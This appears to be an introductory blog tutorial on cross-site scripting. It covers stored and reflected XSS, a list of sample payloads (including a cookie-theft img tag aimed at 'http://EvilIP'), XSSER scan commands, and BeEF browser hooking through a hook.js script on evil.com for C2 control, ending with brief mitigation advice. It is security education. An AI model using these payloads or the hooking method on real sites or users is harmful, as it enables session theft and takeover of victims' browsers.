XSS Basics

What is XSS?:

Cross-Site Scripting, aka XSS, is a vulnerability found on web pages that give attackers the ability to inject malicious scripts into ordinary sites. Attacking an XSS vulnerability can result in bypassing access controls, user information theft, and the ability to gain access to a victim's web browser. Often when a user has fallen victim to an XSS attack, they are unaware anything has even happened. When XSS is discussed in the media, it's used as an overarching term; however, no two XSS attacks are the same. There are two common types of XSS vulnerabilities which can be used for attacks, which are stored and reflected.

The first of these is a persistent/stored XSS vulnerability. This vulnerability gives attackers the ability to store an XSS attack within the website itself. Areas such as a database, forum, comment section, and visitor log are often the most common location on a website for this vulnerability. An XSS vulnerability can occur in these locations if the website fails to sanitize the input fields of forms used to interact with the website, which gives an attacker the ability to input malicious Java code. When a victim visits a page containing a stored XSS attack, their browser will execute the malicious code.

The second vulnerability which can occur on a webpage is known as a reflected XSS. This attack originates from a victim's request rather than the attack originating from malicious code existing on a website. This kind of vulnerability typically exists within the URL of a website. An attacker could send a victim an email containing a malicious link containing an XSS attack to take advantage of this vulnerability. An elementary example of a link containing a reflective XSS attack would be 'https://example.com/random?message=< script >alert(document.cookie)< /script >'. After a user clicks on a link containing an attack like this, the victim's browser will execute the code because it originates from a "trusted" server.

Identification/Exploitation:

Identifying and exploiting an XSS vulnerability use relatively the same syntax. However, when exploiting the vulnerability, an attacker will tweak their syntax to meet their needs. Below are some examples of manual XSS payloads.

Basic Alert < script >alert(1)< /script > < script >alert("1");< /script >

Event Based < body onload=alert('1') > < img width="600" height="400" class="lazyload" data-src=1 onerror=alert(1) > < b onmouseover=alert('vulnerable!') >vulnerable!< /b >

Resource Based < iframe src=javascript:alert(1) > < object data=javascript:alert(1) > < script>alert(document.domain)< /script > < img width="600" height="400" class="lazyload" data-src=http://evil.com >

Cookie Theft < img width="600" height="400" class="lazyload" data-src="http://EvilIP" onerror=alert(document.cookie); >

Maybe you want to use an automated tool for identifying XSS vulnerabilities on a web page. An excellent free tool for accomplishing this testing is XSSER, which can be found by default on Kali. The syntax structure for xsser is "xsser options target" for example, "xsser -u example.com" would be used to accomplish a simple XSS. The syntax of 'xsser –all="example.com" 'can be used to perform an in-depth scan of a target.

If you want to perform more advanced testing using XSSER, there are some great options available. For achieving a more in-depth scan, use the -c option to perform a crawl. For example, if you wanted to scan a target with a crawler depth of 4 levels, use the syntax "xsser -c 4 -u "example.com." If you wanted to perform a test against a specific URL parameter, the -g option can be used. For example, "xsser -u "example.com" -g "page?id=” --auto".

Maybe you have identified an XSS attack vector and wanted to access a user's machine; what tool could you use? Fret not; there is a fantastic tool called BeEF at your disposal. To launch BeEF open a Linux command line and enter beef-xss. If the tool is installed, it will start a web server for command and control (C2) and generate the XSS payload "<scriptsrc="http://< IP >:3000/hook.js">< /script >." Attackers can use this payload to hook a victim's web browser and give an attacker access. An example of what this malicious link looks like is "example.com/random.php?variable=< script src=" http://evil.com:3000/hook.js" >< /script >." See image 1.2 to see what it looks like to start BeEF.

After BeEF has launched, browsing to http://127.0.0.1:3000/ui/panel will give you access to a C2 server. Once a victim has clicked on the malicious link, their web browser will become hooked and listed on the left-hand side of your C2 server. Now that the victim machine is hooked, an attacker can select the target machine and run various built-in scripts against it. These scripts allow for internal enumeration, scraping of sensitive information, and gaining an interactive shell. See image 1.3 for an example of a hooked machine and a small list of scripts that can be run against it.

Now that you know a little bit about identifying and exploiting XSS, get out there and HACK THE PLANET!

Mitigation:

To mitigate XSS vulnerabilities, developers need to integrate filtering, input validation, and character escaping. Filtering can be used to search for keywords and remove them from a user's input. Input validation will ensure an application is rendering the correct data and prevent malicious data from executing. Character escaping will ensure certain characters are changed to other characters to avoid it from being interpreted dangerously.

As a user, you can prevent XSS attacks by using updated browsers with XSS filtering enabled. Many modern browsers such as Chrome, Opera, and Firefox by default have XSS filtering enabled. Additionally, paying attention to what links you are clicking can help prevent an XSS attack.